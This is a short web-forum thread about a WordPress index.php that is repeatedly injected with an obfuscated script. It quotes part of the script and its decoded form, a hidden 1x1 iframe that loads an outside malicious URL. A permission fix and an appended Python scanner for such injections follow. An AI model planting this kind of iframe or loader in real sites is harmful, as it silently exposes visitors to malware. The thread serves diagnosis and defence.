Index.php keeps getting hacked with script line added (2 posts)

  1. size_uk
    Member
    Posted 6 months ago #

    Hi guys,

    I have the latest WordPress installed and strong passwords, but recently my root index.php keeps having a single line added to the first line. Below is a snippet of the code:

    <script language='javascript'>var qTbPndRDkwJlutcricKxUxEtI='';nfSlyjfZ='AsjuH';var lYjMVPyBNRjWFrj='elPQGexZleNfOzzJAaMkkzlTqyRybfPKNhztREiXZXUKmvXG';JlrmrXCfprpeygyuxRDrVtG='ptaWQnnPGeEyikhb';var bRtTmUNExebnOgU=0;ZeUEyxvnsz='lJJLhKl';var trpZvTo='%50%39%37%35%04%15%3F%4C%16%3C%05%72%58%

    It continues with lots more numbers and letters like this. I did some googling and found a Java decryptor which, when I put this code in, came back with the following.

    <iframe src="http://ner-aller.com/in.cgi?default" frameborder="0" scrolling="no" height="1" width="1" hspace="1" vspace="1" marginwidth="0" marginheight="0"></iframe>

    So it seems somehow I am getting an iframe added to the site? I know when the index.php file has changed because when I go to my site without the www, the website won't load and gives an error on line 934 in pluggable.php. I have checked pluggable.php with a fresh one and the line of code seems the same.
    This is the line in question
    header("Location: $location", true, $status);

    As soon as I take this script line of code out from index.php, everything works as normal again. If I go to my site without the www, it works just fine. Some people that have tried to go to the site when the script code has been added have reported the site has a trojan. I am starting to go round in circles and haven't found anyone with the same problem documented anywhere.

    Any help will be gratefully appreciated!

  2. Valdor
    Member
    Posted 6 months ago #

    Hello.

    We have the same problem but there doesn't seem to be much help around for it.

    We are talking about it here:

    http://wordpress.org/support/topic/sql-injection-2

    What theme and plugins are you using?

    You can stop it by changing the permission of index.php to 444 (or 0444).

    This stops the index getting overwritten.
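
A defender-side check for the pattern described in this thread, as an added example that is not part of either post: it flags PHP files with a `<script` tag ahead of the first `<?php` and reports whether each file is still writable. The function names, heuristics and sample files are assumptions constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Heuristics for the pattern in the thread: markup injected ahead of the opening
# <?php tag, carrying a long run of %XX-encoded bytes.
SCRIPT_TAG = re.compile(rb"<script\b", re.IGNORECASE)
PERCENT_RUN = re.compile(rb"(?:%[0-9A-Fa-f]{2}){8,}")

def inspect_php(path):
    """Return a dict of findings for one PHP file, or None if it looks clean."""
    with open(path, "rb") as fh:
        data = fh.read()
    start = data.find(b"<?php")
    # Everything before the first <?php is sent to the browser as raw output.
    prefix = data if start == -1 else data[:start]
    if not SCRIPT_TAG.search(prefix):
        return None
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return {
        "path": path,
        "prefix_bytes": len(prefix),
        "percent_encoded": bool(PERCENT_RUN.search(prefix)),
        "mode": oct(mode),
        "writable": bool(mode & (stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH)),
    }

def scan(docroot):
    """Walk docroot and collect findings for every .php file."""
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in sorted(files):
            if name.endswith(".php"):
                hit = inspect_php(os.path.join(dirpath, name))
                if hit:
                    findings.append(hit)
    return findings

def demo():
    """Constructed sample: one clean file, one with an injected first line."""
    root = tempfile.mkdtemp()
    clean = b"<?php\nrequire('./wp-blog-header.php');\n"
    injected = b"<script language='javascript'>var a='%50%39%37%35%04%15%3F%4C%16';</script>\n" + clean
    for name, body in (("clean.php", clean), ("index.php", injected)):
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(body)
    os.chmod(os.path.join(root, "index.php"), 0o444)  # the mode suggested above
    return scan(root)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Files that legitimately begin with HTML will also be flagged, so treat `percent_encoded` as the stronger signal. Mode 444 does not bind the file's owner, who can change it back, so a finding that reappears means the write path is still open.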
